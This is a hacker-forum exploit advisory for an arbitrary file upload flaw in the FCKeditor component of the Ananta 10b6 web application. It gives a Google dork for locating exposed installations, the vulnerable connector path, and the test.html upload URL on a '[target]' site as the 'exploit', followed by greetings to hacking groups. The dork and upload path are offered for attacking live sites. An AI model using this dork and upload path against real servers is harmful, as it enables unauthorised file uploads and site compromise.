|___________________________________________________|
|
|  Ananta 10b6 (fckeditor) Remote Arbitrary File Upload
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/a/an/ananta/
| DorK : inurl:fck/editor/filemanager/connectors/test.html
|___________________________________________________|


Fckeditor Arbitrary File Upload

The problem is that it is possible to upload files to a location inside the web root "/userdata" via the

/[path]/admin/editor/filemanager/connectors/php/connectors.php script.




Exploit:  



www.[target].com/Script/fck/editor/filemanager/connectors/test.html









____________________________( Greetz )_________________________________
|
|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr 
|   
|  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
|______________________________________________________________________
    

                             Im IRAQi